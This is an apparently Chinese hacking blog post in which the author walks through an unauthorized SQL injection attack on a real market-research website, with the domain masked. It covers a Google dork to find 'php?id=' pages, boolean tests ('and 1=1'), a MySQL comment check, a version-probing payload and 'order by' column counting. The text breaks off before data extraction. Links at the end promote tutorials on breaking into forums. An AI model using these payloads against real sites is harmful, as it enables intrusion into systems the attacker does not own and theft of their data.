最近一直比较关注php注射的东西.学习好几天了.也应该实战一下了.目标http://app.xxxx.com .一个市场调查的门户.找注射点嘛,还是要用我们可爱的搜索引擎.为什么可爱呢?一会就知道了.go go go !!!!!
在google中搜索php?id= site:xxx.com.意思就是说搜索xxx网站中以php?id=的url.嘿.还真让我找到一个. http://app.xxx.com/cati/article_literature.php?id=11 .打开吓我一条,它页面本身就存在错误直接出来了绝对路径.
/data01/www/cati/article_literature.php 呵呵,人品爆发了..通过路径可以得知是台linux主机.判断下是否可以进行注射.and 1=1返回正常,and 1=2返回错误..ok存在注射.然后我们判断数据库,不出意外应该是mysql.传说中的lmap.环境(l=linux m=mysql a=apache p=php)
http://app.xxx.com/cati/article_literature.php?id=11/* 在后面加上/*,返回正常则是mysql.因为/*是mysql的注释标记.
返回正常,确定是mysql的数据库.现在我们来检测下mysql的版本.4.0以上支持union联合查询.一般都回是4.0已经.为什么.因为mysql是开源的数据库不收费傻子才不更新呢.呵呵.
http://app.xxx.com/cati/article_literature.php?id=11 and ord(mid(version(),1,1))>51/* 如我所料.果然是4.0以上的.ok.我们来爆它的字段.
http://app.xxx.com/cati/article_literature.php?id=11 order by 10
返回错误,说明字段小于10
如对本文有疑问,
点击进行留言回复!!
相关文章:
-
-
论坛通用入侵一条龙教学(图)
目前网上有种新的趋势,黑客们的攻击目标开始从网站延伸到论坛和聊天室及留言板等公共场所,而许多用户的论坛密码竟然与E-mail和QQ的密码完全相同,因此对大家的网...
[阅读全文]
-
-
-
追踪入侵JSP网站服务器
在用JSP制作的电子商务网站多如牛毛。但是对于JSP网站而言,安全性真的能够让人放心吗?面对层出不穷的黑客攻击和病毒袭击,JSP网站的服务器能够比其他网站的服务...
[阅读全文]
-
-
-
-
-
-
我要评论
网友评论